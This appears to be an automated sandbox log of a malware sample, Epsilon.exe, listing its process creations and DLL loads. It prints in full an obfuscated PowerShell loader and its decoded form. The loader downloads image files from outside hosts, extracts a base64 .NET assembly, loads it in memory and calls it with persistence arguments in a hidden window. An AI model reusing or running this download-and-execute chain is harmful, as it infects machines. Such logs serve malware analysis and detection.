        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.hckSkpo/sdaolnwod/rwqewqfqwf/qretretr/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
        Source: C:\Users\user\Desktop\Epsilon.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 677174b841ee7.vbsJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$DJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.hckSkpo/sdaolnwod/rwqewqfqwf/qretretr/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -execJump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeSection loaded: feclient.dllJump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeSection loaded: advpack.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
